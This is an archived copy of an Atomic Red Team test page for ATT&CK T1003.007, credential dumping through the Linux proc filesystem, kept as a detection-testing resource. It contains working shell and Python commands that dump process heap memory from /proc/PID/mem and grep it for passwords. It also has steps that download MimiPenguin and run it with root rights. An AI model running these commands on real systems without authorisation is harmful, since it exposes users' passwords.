{
	"id": "895af23e-1c45-496b-bdab-db95b4afed64",
	"created_at": "2026-04-06T00:11:33.566823Z",
	"updated_at": "2026-04-10T03:21:50.912379Z",
	"deleted_at": null,
	"sha1_hash": "8cbaf03f70ccd7039bb045297417e300acc10545",
	"title": "atomic-red-team/atomics/T1003.007/T1003.007.md at master · redcanaryco/atomic-red-team",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 87035,
	"plain_text": "atomic-red-team/atomics/T1003.007/T1003.007.md at master ·\r\nredcanaryco/atomic-red-team\r\nBy Atomic Red Team doc generator\r\nArchived: 2026-04-05 18:20:30 UTC\r\nT1003.007 - OS Credential Dumping: Proc Filesystem\r\nDescription from ATT\u0026CK\r\nAdversaries may gather credentials from the proc filesystem or /proc . The proc filesystem is a\r\npseudo-filesystem used as an interface to kernel data structures for Linux based systems managing\r\nvirtual memory. For each process, the /proc/\u003cPID\u003e/maps file shows how memory is mapped within\r\nthe process’s virtual address space. And /proc/\u003cPID\u003e/mem , exposed for debugging purposes, provides\r\naccess to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung\r\nLinux proc map 2022)\r\nWhen executing with root privileges, adversaries can search these memory locations for all processes\r\non a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as\r\ngrep -E \"^[0-9a-f-]* r\" /proc/\"$pid\"/maps | cut -d' ' -f 1 , to look for fixed strings in memory\r\nstructures or cached hashes.(Citation: atomic-red proc file system) When running without privileged\r\naccess, processes can still view their own virtual memory locations. 
Some services or programs may\r\nsave credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)\r\n(Citation: Polop Linux PrivEsc Gitbook)\r\nIf running as or with the permissions of a web browser, a process can search the /maps \u0026 /mem\r\nlocations for common website credential patterns (that can also be used to find adjacent memory within\r\nthe same structure) in which hashes or cleartext credentials may be located.\r\nSource\r\nAtomic Tests\r\nAtomic Test #1: Dump individual process memory with sh (Local)\r\nAtomic Test #2: Dump individual process memory with sh on FreeBSD (Local)\r\nAtomic Test #3: Dump individual process memory with Python (Local)\r\nAtomic Test #4: Capture Passwords with MimiPenguin\r\nAtomic Test #1: Dump individual process memory with sh (Local)\r\nUsing /proc/$PID/mem , where $PID is the target process ID, use shell utilities to copy process memory to an\r\nexternal file so it can be searched or exfiltrated later.\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md\r\nPage 1 of 7\n\nSupported Platforms: Linux\r\nauto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80\r\nInputs\r\nName Description Type Default Value\r\noutput_file Path where captured results will be placed path /tmp/T1003.007.bin\r\nscript_path Path to script generating the target process path /tmp/T1003.007.sh\r\npid_term Unique string to use to identify target process string T1003.007\r\nAttack Commands: Run with sh ! Elevation Required (e.g. 
root or admin)\r\nsh #{script_path}\r\nPID=$(pgrep -n -f \"#{pid_term}\")\r\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\r\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\r\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\r\nMEM_SIZE=$(echo $((MEM_STOP-MEM_START)))\r\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\r\ngrep -i \"PASS\" \"#{output_file}\"\r\nCleanup Commands\r\nDependencies: Run with sh !\r\nDescription: Script to launch target process must exist\r\nCheck Prereq Commands\r\ntest -f #{script_path}\r\ngrep \"#{pid_term}\" #{script_path}\r\nGet Prereq Commands\r\necho '#!/bin/sh' \u003e #{script_path}\r\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" \u0026\u0026 sleep 30' \u0026\" \u003e\u003e #{script_path}\r\nAtomic Test #2: Dump individual process memory with sh on FreeBSD (Local)\r\nUsing /proc/$PID/mem , where $PID is the target process ID, use shell utilities to copy process memory to an\r\nexternal file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted.\r\nSupported Platforms: Linux\r\nauto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423\r\nInputs\r\nName Description Type Default Value\r\noutput_file Path where captured results will be placed path /tmp/T1003.007.bin\r\nscript_path Path to script generating the target process path /tmp/T1003.007.sh\r\npid_term Unique string to use to identify target process string T1003.007\r\nAttack Commands: Run with sh ! Elevation Required (e.g. 
root or admin)\r\nsh #{script_path}\r\nPID=$(pgrep -n -f \"#{pid_term}\")\r\nMEM_START=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f1)\r\nMEM_STOP=$(head -n 5 /proc/\"${PID}\"/map | tail -1 | cut -d' ' -f2)\r\nMEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))\r\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\r\nstrings \"#{output_file}\" | grep -i PASS\r\nCleanup Commands\r\nDependencies: Run with sh !\r\nDescription: Script to launch target process must exist\r\nCheck Prereq Commands\r\ntest -f #{script_path}\r\ngrep \"#{pid_term}\" #{script_path}\r\nGet Prereq Commands\r\necho '#!/bin/sh' \u003e #{script_path}\r\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" \u0026\u0026 sleep 30' \u0026\" \u003e\u003e #{script_path}\r\nAtomic Test #3: Dump individual process memory with Python (Local)\r\nUsing /proc/$PID/mem , where $PID is the target process ID, use a Python script to copy a process's heap\r\nmemory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted.\r\nSupported Platforms: Linux\r\nauto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63\r\nInputs\r\nName Description Type Default Value\r\noutput_file Path where captured results will be placed path /tmp/T1003.007.bin\r\nscript_path Path to script generating the target process path /tmp/T1003.007.sh\r\npython_script Path to script generating the target process path PathToAtomicsFolder/T1003.007/src/dump_heap.py\r\npid_term Unique string to use to identify target process string T1003.007\r\nAttack Commands: Run with sh ! Elevation Required (e.g. 
root or admin)\r\nsh #{script_path}\r\nPID=$(pgrep -n -f \"#{pid_term}\")\r\nPYTHON=$(which python || which python3 || which python2)\r\n$PYTHON #{python_script} $PID #{output_file}\r\ngrep -i \"PASS\" \"#{output_file}\"\r\nCleanup Commands\r\nDependencies: Run with sh !\r\nDescription: Script to launch target process must exist\r\nCheck Prereq Commands\r\ntest -f #{script_path}\r\ngrep \"#{pid_term}\" #{script_path}\r\nGet Prereq Commands\r\necho '#!/bin/sh' \u003e #{script_path}\r\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" \u0026\u0026 sleep 30' \u0026\" \u003e\u003e #{script_path}\r\nDescription: Requires Python\r\nCheck Prereq Commands\r\n(which python || which python3 || which python2)\r\nGet Prereq Commands\r\necho \"Python 2.7+ or 3.4+ must be installed\"\r\nAtomic Test #4: Capture Passwords with MimiPenguin\r\nMimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). Upon successful execution on an affected system,\r\nMimiPenguin will retrieve passwords from memory and output them to a specified file. See\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\r\nSupported Platforms: Linux\r\nauto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c\r\nInputs\r\nName Description Type Default Value\r\noutput_file Path where captured results will be placed path /tmp/T1003.007Test3.txt\r\nMimiPenguin_Location Path of MimiPenguin script path /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh\r\nAttack Commands: Run with bash ! Elevation Required (e.g. 
root or admin)\r\nsudo #{MimiPenguin_Location} \u003e #{output_file}\r\ncat #{output_file}\r\nCleanup Commands\r\nrm -f #{output_file} \u003e /dev/null\r\nDependencies: Run with sh !\r\nDescription: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})\r\nCheck Prereq Commands\r\nif [ -f \"#{MimiPenguin_Location}\" ]; then exit 0; else exit 1; fi;\r\nGet Prereq Commands\r\nwget -O \"/tmp/mimipenguin.tar.gz\" https://github.com/huntergregal/mimipenguin/releases/download/2.0-\r\nmkdir /tmp/mimipenguin\r\ntar -xzvf \"/tmp/mimipenguin.tar.gz\" -C /tmp/mimipenguin\r\nDescription: Strings must be installed\r\nCheck Prereq Commands\r\nif [ -x \"$(command -v strings --version)\" ]; then exit 0; else exit 1; fi;\r\nGet Prereq Commands\r\nsudo apt-get -y install binutils\r\nDescription: Python2 must be installed\r\nCheck Prereq Commands\r\nif [ -x \"$(command -v python2 --version)\" ]; then exit 0; else exit 1; fi;\r\nGet Prereq Commands\r\nsudo apt-get -y install python2\r\nDescription: Libc-bin must be installed\r\nCheck Prereq Commands\r\nif [ -x \"$(command -v ldd --version)\" ]; then exit 0; else exit 1; fi;\r\nGet Prereq Commands\r\nsudo apt-get -y install libc-bin\r\nSource: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"
	],
	"report_names": [
		"T1003.007.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775434293,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8cbaf03f70ccd7039bb045297417e300acc10545.pdf",
		"text": "https://archive.orkl.eu/8cbaf03f70ccd7039bb045297417e300acc10545.txt",
		"img": "https://archive.orkl.eu/8cbaf03f70ccd7039bb045297417e300acc10545.jpg"
	}
}